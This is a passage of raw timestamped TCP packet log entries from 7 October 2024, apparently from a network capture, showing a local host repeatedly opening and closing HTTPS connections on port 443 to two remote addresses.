                Oct 7, 2024 03:26:49.708673000 CEST49782443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.708690882 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.731713057 CEST4434978113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.733402967 CEST49781443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.733423948 CEST4434978113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.733901024 CEST49781443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.733911037 CEST4434978113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.734915018 CEST4434977813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.735065937 CEST4434977813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.735117912 CEST49778443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.735213995 CEST49778443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.735229969 CEST4434977813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.735239983 CEST49778443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.735244989 CEST4434977813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.737921953 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.737998009 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.738075018 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.738238096 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.738270044 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.749845028 CEST4434977913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.749989033 CEST4434977913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.750050068 CEST49779443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.750097036 CEST49779443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.750114918 CEST4434977913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.750127077 CEST49779443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.750130892 CEST4434977913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.752109051 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.752192020 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.752271891 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.752378941 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.752408981 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.797827959 CEST4434978013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.797985077 CEST4434978013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.798043013 CEST49780443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.798084021 CEST49780443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.798084021 CEST49780443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.798105001 CEST4434978013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.798116922 CEST4434978013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.800158024 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.800241947 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.800312996 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.800430059 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.800451994 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.832004070 CEST4434978113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.832153082 CEST4434978113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.832217932 CEST49781443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.832305908 CEST49781443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.832326889 CEST4434978113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.832340956 CEST49781443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.832348108 CEST4434978113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.834858894 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.834913969 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:49.834985018 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.835195065 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:49.835226059 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.348280907 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.349268913 CEST49782443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.349328995 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.349915981 CEST49782443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.349930048 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.391762972 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.392285109 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.392364979 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.392895937 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.392910004 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.406748056 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.407324076 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.407375097 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.407927990 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.407934904 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.443005085 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.443481922 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.443558931 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.443937063 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.443955898 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.447858095 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.447933912 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.447985888 CEST49782443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.448199987 CEST49782443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.448200941 CEST49782443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.448239088 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.448277950 CEST4434978213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.451170921 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.451237917 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.451317072 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.451483011 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.451503992 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.473615885 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.473917961 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.473937988 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.474404097 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.474414110 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.489831924 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.489964962 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.490022898 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.490067959 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.490067959 CEST49784443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.490092039 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.490113020 CEST4434978413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.492063046 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.492147923 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.492223978 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.492387056 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.492420912 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.512320995 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.512399912 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.512450933 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.512599945 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.512619019 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.512629986 CEST49783443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.512634993 CEST4434978313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.515266895 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.515302896 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.515360117 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.515479088 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.515490055 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.541481972 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.541627884 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.541699886 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.541776896 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.541778088 CEST49785443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.541815042 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.541837931 CEST4434978513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.543932915 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.543953896 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.544023991 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.544130087 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.544145107 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.576977968 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.577111959 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.577166080 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.577209949 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.577210903 CEST49786443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.577231884 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.577253103 CEST4434978613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.579425097 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.579511881 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:50.579596043 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.579722881 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:50.579756021 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.095012903 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.096112013 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.096112013 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.096191883 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.096232891 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.158606052 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.159179926 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.159239054 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.159321070 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.159333944 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.164602041 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.165247917 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.165249109 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.165282965 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.165291071 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.175091982 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:51.175139904 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:51.175343990 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:51.175539017 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:51.175554037 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:51.193769932 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.193917036 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.194082975 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.194083929 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.194861889 CEST49787443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.194892883 CEST4434978713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.196649075 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.196659088 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.196737051 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.196820974 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.196826935 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.222549915 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.223177910 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.223177910 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.223217010 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.223237038 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.227874994 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.228499889 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.228499889 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.228511095 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.228523016 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.264338970 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.264504910 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.264606953 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.264606953 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.264671087 CEST49788443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.264702082 CEST4434978813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.265006065 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.265140057 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.265252113 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.265408039 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.265408039 CEST49789443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.265420914 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.265429020 CEST4434978913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.267029047 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.267041922 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.267062902 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.267139912 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.267169952 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.267231941 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.267240047 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.267272949 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.267420053 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.267446041 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.320851088 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.320940971 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.321276903 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.321278095 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.321419001 CEST49791443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.321441889 CEST4434979113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.324424028 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.324457884 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.324589014 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.324754953 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.324765921 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.332670927 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.332761049 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.332930088 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.332930088 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.332966089 CEST49790443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.332978010 CEST4434979013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.335201979 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.335256100 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.335565090 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.335565090 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:51.335592031 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:51.876554012 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:51.876872063 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:51.876899004 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:51.877379894 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:51.877979994 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:51.878073931 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:51.924232960 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:51.999877930 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.000423908 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.000452995 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.000899076 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.000905037 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.034570932 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.034930944 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.034953117 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.035345078 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.035351038 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.038310051 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.038651943 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.038676023 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.039164066 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.039169073 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.093687057 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.094170094 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.094201088 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.094688892 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.094696999 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.102212906 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.102292061 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.102333069 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.102446079 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.102458954 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.102468967 CEST49793443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.102473021 CEST4434979313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.105117083 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.105154991 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.105211973 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.105356932 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.105369091 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.111244917 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.111553907 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.111574888 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.111968040 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.111977100 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.140795946 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.140855074 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.140896082 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.140954018 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.140957117 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.140969038 CEST49794443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.140973091 CEST4434979413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.143038034 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.143109083 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.143153906 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.143237114 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.143269062 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.143274069 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.143284082 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.143296957 CEST49797443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.143301964 CEST4434979713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.143326998 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.143565893 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.143582106 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.144973040 CEST49800443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.144999981 CEST4434980013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.145066023 CEST49800443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.145188093 CEST49800443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.145199060 CEST4434980013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.197387934 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.197453022 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.197499990 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.197782993 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.197807074 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.197820902 CEST49795443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.197828054 CEST4434979513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.200936079 CEST49801443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.200978041 CEST4434980113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.201040983 CEST49801443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.201334000 CEST49801443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.201345921 CEST4434980113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.263124943 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.263206005 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.263269901 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.263398886 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.263423920 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.263437033 CEST49796443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.263456106 CEST4434979613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.266200066 CEST49802443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.266215086 CEST4434980213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.266271114 CEST49802443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.266540051 CEST49802443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.266547918 CEST4434980213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.782768011 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.783729076 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.783754110 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.784858942 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.784868956 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.838929892 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.839737892 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.839785099 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.840362072 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.840383053 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.867094994 CEST4434980013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.867724895 CEST49800443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.867752075 CEST4434980013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.868880987 CEST4434980113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.868926048 CEST49800443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.868931055 CEST4434980013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.869555950 CEST49801443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.869630098 CEST4434980113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.870105982 CEST49801443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.870120049 CEST4434980113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.880851984 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.880927086 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.881268024 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.881268024 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.883532047 CEST49798443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.883553028 CEST4434979813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.884793043 CEST49803443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.884824991 CEST4434980313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.884943962 CEST49803443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.888859034 CEST49803443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.888876915 CEST4434980313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.941133022 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.941214085 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.941601038 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.941601038 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.943418980 CEST49799443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.943442106 CEST4434979913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.948863983 CEST49804443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.948920012 CEST4434980413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.949999094 CEST4434980213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:52.950182915 CEST49804443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.950613976 CEST49802443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:52.950615883 CEST49804443192.168.2.413.107.246.60
